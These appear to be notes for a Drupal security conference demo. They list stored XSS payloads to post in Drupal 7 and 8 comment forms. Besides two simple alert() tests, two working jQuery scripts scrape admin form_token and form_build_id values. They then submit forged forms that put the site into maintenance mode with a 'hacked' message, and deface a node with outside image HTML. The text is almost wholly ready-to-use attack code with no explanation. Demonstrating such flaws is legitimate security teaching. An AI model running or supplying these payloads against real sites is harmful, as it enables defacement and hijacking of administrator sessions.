drupaleurope demo

#0 d7 site: node/1 comment form with full html input format by uid0.
<script>alert('XSS')</script>

#1 d7 site: node/1 comment form with full html input format by uid0.

<script>
  jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance',
    function (data, status) {
      if (status == 'success') {
        var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/);
        var token = matches[1];
        var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/);
        var build_id = matches[1];
        var payload = {
          "maintenance_mode": 1,
          "form_id": 'system_site_maintenance_mode',
          "maintenance_mode_message": 'Nice work, your site is hacked!',
          "form_token": token,
          "form_build_id" : build_id,
          "op" : 'Save configuration'
        };
        jQuery.post(Drupal.settings.basePath +  'admin/config/development/maintenance', payload);
      }})(jQuery);
</script>

#2 d7 site: node/2 comment form again
<script>
  jQuery.get(Drupal.settings.basePath + 'node/2/edit',
    function (data, status) {
      if (status == 'success') {
        var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/);
        var token = matches[1];
        var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/);
        var build_id = matches[1];
        var payload = {
          "body[und][0][value]": 'Something really bad!<img src="http://www.thenextrex.com/wp-content/uploads/2016/10/Hacked-by.gif">',
          "body[und][0][format]": 'full_html',
          "status": 1,
          "form_id": 'article_node_form',
          "form_token": token,
          "form_build_id" : build_id,
          "op" : 'Save'
        };
        jQuery.post(Drupal.settings.basePath +  'node/2/edit', payload);
      }})(jQuery);
</script>

#3 d8 site: node/1 just a simple example
<script>alert('XSS')</script>